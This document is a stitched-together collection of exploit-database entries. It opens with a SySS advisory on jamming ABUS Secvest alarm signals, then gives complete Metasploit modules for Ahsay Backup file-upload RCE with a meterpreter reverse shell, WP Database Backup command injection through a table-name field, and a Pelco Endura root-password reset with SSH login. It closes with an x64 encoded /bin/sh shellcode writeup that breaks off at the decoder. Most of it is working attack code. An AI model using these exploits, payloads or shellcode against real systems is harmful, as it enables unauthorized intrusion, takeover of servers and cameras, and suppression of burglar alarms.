Advisory ID: SYSS-2019-004
Product: ABUS Secvest (FUAA50000)
Manufacturer: ABUS
Affected Version(s): v3.01.01
Tested Version(s): v3.01.01
Vulnerability Type: Message Transmission - Unchecked Error Condition
(CWE-391)
Risk Level: High
Solution Status: Open
Manufacturer Notification: 2019-03-02
Solution Date: -
Public Disclosure: 2019-07-26
CVE Reference: CVE-2019-14261
Authors of Advisory: Matthias Deeg (SySS GmbH), Thomas Detert

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Overview:

ABUS Secvest (FUAA50000) is a wireless alarm system with different
features.

Some of the supported features as described by the manufacturer are
(see [1]):

"
* Convenient operation via the app (Android/iOS), integrated web
  browser and also at the alarm panel
* For up to 50 users with freely selectable control options
  (code/chip key/remote control)
* Active intrusion protection in combination with additional mechatronic
  wireless window/door locks
* Video verification of alarms via email, push notifications or via the
  app
* Up to 48 individually identifiable wireless detectors, eight control
  panels, 50 remote controls
* Integrated dialling device
* VdS Home certified and EN 50131-1 Level 2
* Alarm verification via the integration of up to six IP cameras
* 32 additional wireless outputs for flexible event control
* Switching to monitoring station via protocols possible
"

Due to an insufficient implementation of the jamming detection, an
attacker is able to suppress correctly received RF messages sent between
wireless peripheral components, for example wireless detectors or remote
controls, and the ABUS Secvest alarm central.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Vulnerability Details:

Thomas Detert found out that the jamming detection of the ABUS alarm
central does not detect short jamming signals that are shorter than
normal ABUS RF messages.

Thus, an attacker is able to perform a "reactive jamming" attack. The
reactive jamming simply detects the start of a RF message sent by a
component of the ABUS Secvest wireless alarm system, for instance a
wireless motion detector (FUBW50000) or a remote control (FUBE50014 or
FUBE50015), and overlays it with random data before the original RF
message ends. Thereby, the receiver (alarm central) is not able to
properly decode the original transmitted signal.

This enables an attacker to suppress correctly received RF messages of
the wireless alarm system in an unauthorized manner, for instance status
messages sent by a detector indicating an intrusion.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Proof of Concept (PoC):

Thomas Detert developed a Teensy-based PoC tool using a CC1101 sub-1GHz
transceiver that allows suppressing arming the alarm system in an
unauthorized way. He provided his tool including documentation and
source to SySS GmbH for responsible disclosure purposes.

SySS GmbH could successfully perform the described reactive jamming attack
against an ABUS Secvest wireless alarm system. RF messages sent by the
configured ABUS Secvest components FUBE50015 (remote control), FUBW50000
(motion detector), and FUMK50000W (magnetic contact detector) were
successfully suppressed and no alarm was triggered.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Solution:

SySS GmbH is not aware of a solution for this reported security
vulnerability.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclosure Timeline:

2019-03-02: Vulnerability reported to manufacturer
2019-07-26: Public release of security advisory

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

References:

[1] Product website for ABUS Secvest wireless alarm system

https://www.abus.com/eng/Home-Security/Alarm-systems/Secvest-wireless-alarm-system/Alarm-panels-and-kits/Secvest-Wireless-Alarm-System
[2] SySS Security Advisory SYSS-2019-004

https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2019-004.txt
[3] SySS GmbH, SySS Responsible Disclosure Policy
    https://www.syss.de/en/news/responsible-disclosure-policy/

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Credits:

This security vulnerability was found by Thomas Detert.

Mr. Detert reported his finding to SySS GmbH where it was verified and
later reported to the manufacturer by Matthias Deeg.

E-Mail: matthias.deeg (at) syss.de
Public Key:
https://www.syss.de/fileadmin/dokumente/Materialien/PGPKeys/Matthias_Deeg.asc
Key fingerprint = D1F0 A035 F06C E675 CDB9 0514 D9A4 BF6A 34AD 4DAB

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Disclaimer:

The information provided in this security advisory is provided "as is"
and without warranty of any kind. Details of this security advisory may
be updated in order to provide as accurate information as possible. The
latest version of this security advisory is available on the SySS Web
site.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Copyright:

Creative Commons - Attribution (by) - Version 3.0
URL: http://creativecommons.org/licenses/by/3.0/deed.en

# Exploit Title: Authenticated insecure file upload and code execution flaw in Ahsay Backup v7.x - v8.1.1.50. (Metasploit)
# Date: 26-6-2019
# Exploit Author: Wietse Boonstra
# Vendor Homepage: https://ahsay.com
# Software Link: http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe
# Version: 7.x < 8.1.1.50 (REQUIRED)
# Tested on: Windows / Linux
# CVE : CVE-2019-10267

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::EXE
  include Msf::Exploit::FileDropper
  include REXML

  def initialize(info = {})
    super(update_info(info,
'Name'        => 'Ahsay Backup v7.x-v8.1.1.50 (authenticated) file upload',
'Description' => %q{
       This module exploits an authenticated insecure file upload and code
       execution flaw in Ahsay Backup v7.x - v8.1.1.50. To succesfully execute
       the upload credentials are needed, default on Ahsay Backup trial
       accounts are enabled so an account can be created.

       It can be exploited in Windows and Linux environments to get remote code
       execution (usualy as SYSTEM). This module has been tested successfully
       on Ahsay Backup v8.1.1.50 with Windows 2003 SP2 Server. Because of this
       flaw all connected clients can be configured to execute a command before
       the backup starts. Allowing an attacker to takeover even more systems
       and make it rain shells!

       Setting the CREATEACCOUNT to true will create a new account, this is
       enabled by default.
       If credeantials are known enter these and run the exploit.
      },
'Author'       =>
        [
'Wietse Boonstra'
        ],
'License'     => MSF_LICENSE,
'References'  =>
        [
          [ 'CVE', '2019-10267'],
          [ 'URL', 'https://www.wbsec.nl/ahsay/' ],
          [ 'URL', 'http://ahsay-dn.ahsay.com/v8/81150/cbs-win.exe' ]
        ],
'Privileged'  => true,
'Platform'    => 'win',
'DefaultOptions' => {
'RPORT' => 443,
'SSL' => true,
'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
      },
'Targets'     =>
        [
          [  'Windows x86',
            {
'Arch' => ARCH_X86,
'Platform' => 'win'
            }
          ],
          [ 'Linux x86', # should work but untested
            {
'Arch' => ARCH_X86,
'Platform' => 'linux'
            },
          ],

        ],
'DefaultTarget'  => 0,
'DisclosureDate' => 'Jun 1 2019'))

    register_options(
      [
        Opt::RPORT(443),
        OptString.new('TARGETURI', [true, 'Path to Ahsay', '/']),
        OptString.new('USERNAME', [true, 'Username for the (new) account', Rex::Text.rand_text_alphanumeric(8)]),
        OptString.new('PASSWORD', [true, 'Password for the (new) account', Rex::Text.rand_text_alpha(8) + Rex::Text.rand_text_numeric(5) + Rex::Text.rand_char("","!$%^&*")]),
        OptString.new('CREATEACCOUNT', [false, 'Create Trial account', 'false']),
        OptString.new('UPLOADPATH', [false, 'Payload Path', '../../webapps/cbs/help/en']),

      ])
  end

  def is_trial_enabled?
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','isTrialEnabled'),
'method' => 'POST',
'data'   => ''
    })
    if res and res.code == 200 and "ENABLED" =~ /#{res.body}/
      return true
    else
      return false
    end
  end

  def check_account?
    headers = create_request_headers
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','getUserProfile'),
'method' => 'POST',
'data'   => '',
'headers' => headers
    })
    if res and res.code == 200
      print_good("Username and password are valid!")
      return true
    elsif res and res.code == 500 and "USER_NOT_EXIST" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username incorrect!')
      print_status("Username does not exist.")
      return false
    elsif res and res.code == 500 and "PASSWORD_INCORRECT" =~ /#{res.body}/
      # fail_with(Failure::NoAccess, 'Username exists but password incorrect!')
      print_status("Username exists but password incorrect!")
      return false
    else
      return false
    end
  end

  def create_request_headers
    headers = {}
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers['X-RSW-custom-encode-username'] = username
    headers['X-RSW-custom-encode-password'] = password
    headers
  end

  def exploit
    username = datastore['USERNAME']
    password = datastore['PASSWORD']

    if is_trial_enabled? and datastore['CREATEACCOUNT'] == "true"
      if username == "" or password == ""
        fail_with(Failure::NoAccess, 'Please set a username and password')
      else
        #check if account does not exists?
        if !check_account?
          # Create account and check if it is valid
          if create_account?
            drop_and_execute()
          else
            fail_with(Failure::NoAccess, 'Failed to authenticate')
          end
        else
          #Need to fix, check if account exist
          print_good("No need to create account, already exists!")
          drop_and_execute()
        end
      end
    elsif username != "" and password != ""
      if check_account?
        drop_and_execute()
      else
        if is_trial_enabled?
          fail_with(Failure::NoAccess, 'Username and password are invalid. But server supports trial accounts, you can create an account!')
        end
        fail_with(Failure::NoAccess, 'Username and password are invalid')
      end
    else
      fail_with(Failure::UnexpectedReply, 'Missing some settings')
    end
  end

  def create_account?
    headers = create_request_headers
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','user','addTrialUser'),
'method' => 'POST',
'data'   => '',
'headers' => headers
    })
    # print (res.body)
    if res and res.code == 200
      print_good("Account created")
      return true
    elsif res.body.include?('LOGIN_NAME_IS_USED')
      fail_with(Failure::NoAccess, 'Username is in use!')
    elsif res.body.include?('PWD_COMPLEXITY_FAILURE')
      fail_with(Failure::NoAccess, 'Password not complex enough')
    else
      fail_with(Failure::UnexpectedReply, 'Something went wrong!')
    end
  end

  def remove_account
    if datastore['CREATEACCOUNT']
      username = datastore['USERNAME']
      users_xml = "../../conf/users.xml"
      print_status("Looking for account #{username} in #{users_xml}")
      xml_doc = download(users_xml)
      xmldoc = Document.new(xml_doc)
      el = 0
      xmldoc.elements.each("Setting/Key") do |e|
          el = el + 1
          e.elements.each("Value") do |a|
              if a.attributes["name"].include?('name')
                  if a.attributes["data"].include?(username)
                      print_good("Found account")
                      xmldoc.root.elements.delete el
                      print_status("Removed account")
                  end
              end
          end
      end
      new_xml = xmldoc.root
      print_status("Uploading new #{users_xml} file")
      upload(users_xml, new_xml.to_s)
      print_good("Account is inaccesible when service restarts!")
    end
  end

  def prepare_path(path)
    if path.end_with? '/'
      path = path.chomp('/')
    end
    path
  end

  def drop_and_execute()
    path = prepare_path(datastore['UPLOADPATH'])
    exploitpath = path.gsub("../../webapps/cbs/",'')
    exploitpath = exploitpath.gsub("/","\\\\\\")
    requestpath = path.gsub("../../webapps/",'')

    #First stage payload creation and upload
    exe = payload.encoded_exe
    exe_filename = Rex::Text.rand_text_alpha(10)
    exefileLocation = "#{path}/#{exe_filename}.exe"
    print_status("Uploading first stage payload.")
    upload(exefileLocation, exe)
    #../../webapps/cbs/help/en
    exec = %Q{<% Runtime.getRuntime().exec(getServletContext().getRealPath("/") + "#{exploitpath}\\\\#{exe_filename}.exe");%>}

    #Second stage payload creation and upload
    jsp_filename = Rex::Text.rand_text_alpha(10)
    jspfileLocation = "#{path}/#{jsp_filename}.jsp"
    print_status("Uploading second stage payload.")
    upload(jspfileLocation, exec)
    proto = ssl ? 'https' : 'http'
    url = "#{proto}://#{datastore['RHOST']}:#{datastore['RPORT']}" + normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp")

    #Triggering the exploit
    print_status("Triggering exploit! #{url}" )
    res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, "#{requestpath}/#{jsp_filename}.jsp"),
'method' => 'GET'
    })
    if res and res.code == 200
      print_good("Exploit executed!")
    end

    #Cleaning up
    print_status("Cleaning up after our selfs.")
    remove_account
    print_status("Trying to remove #{exefileLocation}, but will fail when in use.")
    delete(exefileLocation)
    delete(jspfileLocation)
    delete("../../user/#{datastore['USERNAME']}",true)
  end

  def upload(fileLocation, content)
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    uploadPath = Rex::Text.encode_base64(fileLocation)

    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    headers['X-RSW-custom-encode-path'] = uploadPath
    res = send_request_raw({
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','upload'),
'method' => 'PUT',
'headers' => headers,
'data' => content,
'timeout' => 20
    })
    if res && res.code == 201
      print_good("Succesfully uploaded file to #{fileLocation}")
    else
      fail_with(Failure::Unknown, "#{peer} - Server did not respond in an expected way")
    end
  end

  def download(fileLocation)
    #TODO make vars_get variable
    print_status("Downloading file")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/download?X-RSW-custom-encode-path=../../conf/users.xml
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','download'),
'method' => 'GET',
'headers' => headers,
'vars_get' => {
'X-RSW-custom-encode-path' => fileLocation
      }
    })

    if res and res.code == 200
      res.body
    end
  end

  def delete(fileLocation, recursive=false)
    print_status("Deleting file #{fileLocation}")
    username = Rex::Text.encode_base64(datastore['USERNAME'])
    password = Rex::Text.encode_base64(datastore['PASSWORD'])
    headers = {}
    headers['X-RSW-Request-0'] = username
    headers['X-RSW-Request-1'] = password
    res = send_request_cgi({
      #/obs/obm7/file/delete?X-RSW-custom-encode-path=../../user/xyz
'uri' => normalize_uri(target_uri.path, 'obs','obm7','file','delete'),
'method' => 'DELETE',
'headers' => headers,
'vars_get' => {
'X-RSW-custom-encode-path' => fileLocation,
'recursive' => recursive
      }
    })

    if res and res.code == 200
      res.body
    end
  end

  def check
    #We need a cookie first
    cookie_res = send_request_cgi({
      #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, 'cbs','system','ShowDownload.do'),
'method' => 'GET'
    })

    if cookie_res and cookie_res.code == 200
      cookie = cookie_res.get_cookies.split()[0]
    else
      return Exploit::CheckCode::Unknown
    end

    if defined?(cookie)
      #request the page with all the clientside software links.
      headers = {}
      headers['Cookie'] = cookie
      link = send_request_cgi({
        #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, 'cbs','system','download','indexTab1.jsp'),
'method' => 'GET',
'headers' => headers
      })

      if link and link.code == 200
        link.body.each_line do |line|
          #looking for the link that contains obm-linux and ends with .sh
          if line.include? '<a href="/cbs/download/' and line.include? '.sh' and line.include? 'obm-linux'
            filename = line.split("<a")[1].split('"')[1].split("?")[0]
            filecontent = send_request_cgi({
              #/cbs/system/ShowDownload.do
'uri' => normalize_uri(target_uri.path, filename),
'method' => 'GET',
'headers' => headers
            })
            if filecontent and filecontent.code == 200
              filecontent.body.each_line do |l|
                if l.include? 'VERSION="'
                  number = l.split("=")[1].split('"')[1]
                  if number.match /(\d+\.)?(\d+\.)?(\d+\.)?(\*|\d+)$/
                    if number <= '8.1.1.50' and not number < '7'
                      return Exploit::CheckCode::Appears
                    else
                      return Exploit::CheckCode::Safe
                    end
                  end
                end
              end
            else
              return Exploit::CheckCode::Unknown
            end
          end
        end
      else
        return Exploit::CheckCode::Unknown
      end
    else
      return Exploit::CheckCode::Unknown
    end

  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::CmdStager
  include Msf::Exploit::Powershell
  include Msf::Exploit::Remote::HTTP::Wordpress

  def initialize(info = {})
    super(update_info(info,
'Name'           => 'WP Database Backup RCE',
'Description'    => %q(
        There exists a command injection vulnerability in the Wordpress plugin
        `wp-database-backup` for versions < 5.2.

        For the backup functionality, the plugin generates a `mysqldump` command
        to execute. The user can choose specific tables to exclude from the backup
        by setting the `wp_db_exclude_table` parameter in a POST request to the
        `wp-database-backup` page. The names of the excluded tables are included in
        the `mysqldump` command unsanitized. Arbitrary commands injected through the
        `wp_db_exclude_table` parameter are executed each time the functionality
        for creating a new database backup are run.

        Authentication is required to successfully exploit this vulnerability.
      ),
'License'        => MSF_LICENSE,
'Author'         =>
      [
'Mikey Veenstra / Wordfence',  # Vulnerability Discovery
'Shelby Pace'                  # Metasploit module
      ],
'References'     =>
        [
          [ 'URL', 'https://www.wordfence.com/blog/2019/05/os-command-injection-vulnerability-patched-in-wp-database-backup-plugin/' ],
        ],
'Platform'       => [ 'win', 'linux' ],
'Arch'           => [ ARCH_X86, ARCH_X64 ],
'Targets'        =>
        [
          [
'Windows',
            {
'Platform'        => 'win',
'Arch'            => [ ARCH_X86, ARCH_X64 ]
            }
          ],
          [
'Linux',
            {
'Platform'        =>  'linux',
'Arch'            =>  [ ARCH_X86, ARCH_X64 ],
'CmdStagerFlavor' =>  'printf'
            }
          ]
        ],
'DisclosureDate' => '2019-04-24',
'DefaultTarget'  => 0
    ))

    register_options(
    [
      OptString.new('USERNAME', [ true, 'Wordpress username', '' ]),
      OptString.new('PASSWORD', [ true, 'Wordpress password', '' ]),
      OptString.new('TARGETURI', [ true, 'Base path to Wordpress installation', '/' ])
    ])
  end

  def check
    return CheckCode::Unknown unless wordpress_and_online?

    changelog_uri = normalize_uri(target_uri.path, 'wp-content', 'plugins', 'wp-database-backup', 'readme.txt')
    res = send_request_cgi(
'method'  =>  'GET',
'uri'     =>  changelog_uri
    )

    if res && res.code == 200
      version = res.body.match(/=+\s(\d+\.\d+)\.?\d*\s=/)
      return CheckCode::Detected unless version && version.length > 1

      vprint_status("Version of wp-database-backup detected: #{version[1]}")
      return CheckCode::Appears if Gem::Version.new(version[1]) < Gem::Version.new('5.2')
    end
    CheckCode::Safe
  end

  def exploit
    cookie = wordpress_login(datastore['USERNAME'], datastore['PASSWORD'])
    fail_with(Failure::NoAccess, 'Unable to log into Wordpress') unless cookie

    res = create_exclude_table(cookie)
    nonce = get_nonce(res)
    create_backup(cookie, nonce)

    clear_exclude_table(cookie)
  end

  def create_exclude_table(cookie)
    @exclude_uri = normalize_uri(target_uri.path, 'wp-admin', 'tools.php')
    res = send_request_cgi(
'method'    =>  'GET',
'uri'       =>  @exclude_uri,
'cookie'    =>  cookie,
'vars_get'  =>  { 'page'  =>  'wp-database-backup' }
    )

    fail_with(Failure::NotFound, 'Unable to reach the wp-database-backup settings page') unless res && res.code == 200
    print_good('Reached the wp-database-backup settings page')
    if datastore['TARGET'] == 1
      comm_payload = generate_cmdstager(concat_operator: '&& ', temp: './')
      comm_payload = comm_payload.join('&&')
      comm_payload = comm_payload.gsub('\'', '')
      comm_payload = "; #{comm_payload} ;"
    else
      comm_payload = "& #{cmd_psh_payload(payload.encoded, payload.arch, remove_comspec: true, encode_final_payload: true)} & ::"
    end

    table_res = send_request_cgi(
'method'    =>  'POST',
'uri'       =>  @exclude_uri,
'cookie'    =>  cookie,
'vars_post' =>
      {
'wpsetting'                       =>  'Save',
'wp_db_exclude_table[wp_comment]' =>  comm_payload
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to submit payload as an excluded table') unless table_res && table_res.code
    print_good('Successfully added payload as an excluded table')

    res.get_html_document
  end

  def get_nonce(response)
    fail_with(Failure::UnexpectedReply, 'Failed to get a proper response') unless response

    div_res = response.at('p[@class="submit"]')
    fail_with(Failure::NotFound, 'Failed to find the element containing the nonce') unless div_res

    wpnonce = div_res.to_s.match(/_wpnonce=([0-9a-z]*)/)
    fail_with(Failure::NotFound, 'Failed to retrieve the wpnonce') unless wpnonce && wpnonce.length > 1

    wpnonce[1]
  end

  def create_backup(cookie, nonce)
    first_res = send_request_cgi(
'method'    =>  'GET',
'uri'       =>  @exclude_uri,
'cookie'    =>  cookie,
'vars_get'  =>
      {
'page'      =>  'wp-database-backup',
'_wpnonce'  =>  nonce,
'action'    =>  'createdbbackup'
      }
    )

    res = send_request_cgi(
'method'    =>  'GET',
'uri'       =>  @exclude_uri,
'cookie'    =>  cookie,
'vars_get'  =>
      {
'page'          =>  'wp-database-backup',
'notification'  =>  'create'
      }
    )

    fail_with(Failure::UnexpectedReply, 'Failed to create database backup') unless res && res.code == 200 && res.body.include?('Database Backup Created Successfully')
    print_good('Successfully created a backup of the database')
  end

  def clear_exclude_table(cookie)
    res = send_request_cgi(
'method'    =>  'POST',
'uri'       =>  @exclude_uri,
'cookie'    =>  cookie,
'vars_post' =>
      {
'wpsetting'                       =>  'Save',
'wp_db_exclude_table[wp_comment]' =>  'wp_comment'
      }
    )

   fail_with(Failure::UnexpectedReply, 'Failed to delete the remove the payload from the excluded tables') unless res && res.code == 200
   print_good('Successfully deleted the payload from the excluded tables list')
  end
end

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::Udp
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::SSH

  def initialize(info={})
    super(update_info(info,
'Name'           => "Schneider Electric Pelco Endura NET55XX Encoder",
'Description'    => %q(
        This module exploits inadequate access controls within the webUI to enable
        the SSH service and change the root password. This module has been tested successfully
        on: NET5501, NET5501-I, NET5501-XT, NET5504, NET5500, NET5516, NET550 versions.
      ),
'License'        => MSF_LICENSE,
'Author'         =>
        [
'Lucas Dinucci <idntk.lucdin@gmail.com>',
'Vitor Esperança <vitor@machiaveliclabs.com>'
        ],
'References'     =>
        [
          ['CVE', '2019-6814'],
          ['URL', 'https://www.schneider-electric.com/en/download/document/SEVD-2019-134-01/']
        ],
'Payload'        =>
        {
'Compat' => {
'PayloadType'    => 'cmd_interact',
'ConnectionType' => 'find'
          }
        },
'Platform'       => 'unix',
'Arch'           => ARCH_CMD,
'Targets'     => [ [ "Universal", {} ] ],
'Privileged'     => true,
'DisclosureDate' => "Jan 25 2019",
'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('NEW_PASSWORD', [ true, 'New password to be set for the root account', Rex::Text.rand_text_alphanumeric(16)]),
        OptInt.new('TIMEOUT', [ true, 'Timeout for the requests', 10])
      ]
    )

    register_advanced_options(
      [
        OptInt.new('UDP_PORT', [ true, 'UDP port for the ONVIF service', 3702]),
        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
      ]
    )
  end

  def new_password
    datastore['NEW_PASSWORD']
  end

  def check
    xmlPayload = '<?xml version="1.0" encoding="UTF-8"?>'\
'<Envelope xmlns="http://www.w3.org/2003/05/soap-envelope">'\
'<Header xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing">'\
'<a:Action mustUnderstand="1">http://schemas.xmlsoap.org/ws/2005/04/discovery/Probe</a:Action>'\
'<a:MessageID>uuid:f3d577a3-431f-4450-ab45-b480042b9c74</a:MessageID>'\
'<a:ReplyTo>'\
'<a:Address>http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous</a:Address>'\
'</a:ReplyTo>'\
'<a:To mustUnderstand="1">urn:schemas-xmlsoap-org:ws:2005:04:discovery</a:To>'\
'</Header>'\
'<Body>'\
'<Probe xmlns="http://schemas.xmlsoap.org/ws/2005/04/discovery">'\
'<Types xmlns:dp0="http://www.onvif.org/ver10/network/wsdl">dp0:NetworkVideoTransmitter</Types>'\
'</Probe>'\
'</Body>'\
'</Envelope><?xml version="1.0" encoding="UTF-8"?>'

    connect_udp(true, {'RPORT' => datastore['UDP_PORT']})
    udp_sock.put(xmlPayload)
    resp = []
    resp << udp_sock.get(datastore['TIMEOUT'])
    xmlResponse = resp.join(',')
    disconnect_udp
    if xmlResponse.include?("NET5501") || xmlResponse.include?("NET5501-I") || xmlResponse.include?("NET5501-XT") || xmlResponse.include?("NET5504") || xmlResponse.include?("NET5500") || xmlResponse.include?("NET5516") || xmlResponse.include?("NET5508")
      return Exploit::CheckCode::Appears
    end
     CheckCode::Safe
  end

  def change_password
    print_status("#{peer} - Attempt to change the root password...")
    post = {"enable": true, "passwd": new_password, "userid": "root"}.to_json

    login = send_request_cgi({
'method' => 'POST',
'uri' =>  normalize_uri(target_uri.path, '/cgi-bin/webra.fcgi?network/ssh'),
'data' => post,
'headers' =>
      {
'Cookie'        => 'live_onoff=0; userid=admin; grpid=ADMIN; permission=2147483647',
'Content-Type'  => 'application/json;charset=utf-8'
      }
    }, timeout=datastore['TIMEOUT'])

    fail_with(Failure::UnexpectedReply, "Failed to change root password") unless login && login.code == 200
    print_good("#{rhost}:80 - Successfully changed the root password...")
    print_good("#{rhost}:80 - New credentials: User: root / Password: #{new_password}")
  end

  def do_login
    change_password
    print_status("#{rhost}:22 - Attempt to start a SSH connection...")
    factory = ssh_socket_factory
    opts = {
      :auth_methods    => ['password', 'keyboard-interactive'],
      :port            => 22,
      :use_agent       => false,
      :config          => true,
      :password        => new_password,
      :proxy           => factory,
      :non_interactive => true,
      :verify_host_key => :never
    }
    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
    begin
      ssh = nil
      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
        ssh = Net::SSH.start(datastore['RHOST'], 'root', opts)
      end
    rescue Rex::ConnectionError
    rescue Net::SSH::Disconnect, ::EOFError
      print_error "#{rhost}:22 SSH - Disconnected during negotiation"
    rescue ::Timeout::Error
      print_error "#{rhost}:22 SSH - Timed out during negotiation"
    rescue Net::SSH::AuthenticationFailed
      print_error "#{rhost}:22 SSH - Failed authentication"
    rescue Net::SSH::Exception => e
      print_error "#{rhost}:22 SSH Error: #{e.class} : #{e.message}"
    end
    if ssh
      conn = Net::SSH::CommandStream.new(ssh)
      return conn
    end
  end

  def exploit
    conn = do_login
    if conn
      print_good("#{rhost}:22 - Session established ")
      handler(conn.lsock)
    end
  end
end

/*
######################################## description ########################################

; Title     : X64 [NOT +SHIFT-N+ XOR-N] encoded /bin/sh - shellcode
; Author    : Pedro Cabral
; Twitter   : @CabrallPedro
; LinkedIn  : https://www.linkedin.com/in/pedro-cabral1992
; SLAE ID   : SLAE64 - 1603
; Purpose   : spawn /bin/sh shell
; Tested On : Ubuntu 16.04.6 LTS
; Arch      : x64
; Size      : 168 bytes

########################################## sh.asm ###########################################

global _start

section .text

_start:
        xor rax, rax
        push rax ; push null
        mov rbx, 0x68732f2f6e69622f ;/bin//sh in reverse
        push rbx ; push to the stack
        mov rdi, rsp ; store the /bin//sh on rdi
        push rax ; push null
        mov rdx, rsp ; set rdx
        push rdi ; push the address of /bin//sh
        mov rsi, rsp ; set rsi
        add rax, 59 ; rax = 59 (execve)
        syscall


#################################### original shellcode #####################################

pedro@ubuntu>nasm -felf64 sh.asm -o sh.o
pedro@ubuntu>ld -N -o sh sh.o
pedro@ubuntu>echo;objdump -d ./sh.o|grep '[0-9a-f]:'|grep -v 'file'|cut -f2 -d:|cut -f1-7 -d''|tr -s ''|tr '\t'''|sed 's/ $//g'|sed 's/ /\\x/g'|paste -d '' -s |sed 's/^/"/'|sed 's/$/"/g';echo

"\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"


########################################  encode.py  ########################################

#!/usr/bin/python

import sys

if len(sys.argv) != 3:
        print "Usage : python encode.py <SHIFT number> <XOR number>"
        sys.exit(0)

shift   = int(sys.argv[1])
xor     = int(sys.argv[2])

shellcode = ("\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05")


# addition to the inicial of the shellcode the SHIFT and XOR values
encoded_shellcode =""
encoded_shellcode += '0x01' #prevent null bytes on the shellcode 
encoded_shellcode += '%02x, ' %shift
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor

# [NOT + SHL-N + XOR-N] encoded shellcode
for i in bytearray(shellcode):
  new = ~i & 0xff
  new = new << shift
        new = new ^ xor
        encoded_shellcode += '0x'
        encoded_shellcode += '%02x, ' %new

# end of shellcode
encoded_shellcode += '0x'
encoded_shellcode += '%02x, ' %xor
encoded_shellcode += '0x'
encoded_shellcode += '%02x' %xor

# print encoded shellcode
print encoded_shellcode

#################################### Encoded Shellcode  #####################################

pedro@ubuntu>python encoder.py 4 1337
0x0104, 0x539, 0xe49, 0x9d9, 0x6c9, 0xfc9, 0xe49, 0x179, 0x839, 0xce9, 0xc59, 0xc29, 0x839, 0x839, 0xdf9, 0xc49, 0xff9, 0xe49, 0x259, 0x4b9, 0xfc9, 0xe49, 0x259, 0x4e9, 0xfb9, 0xe49, 0x259, 0x4a9, 0xe49, 0x2f9, 0x6c9, 0x979, 0xa39, 0xa99, 0x539, 0x539

####################################### decoder.asm  ########################################

global _start

section .text

_start:

  jmp decoder
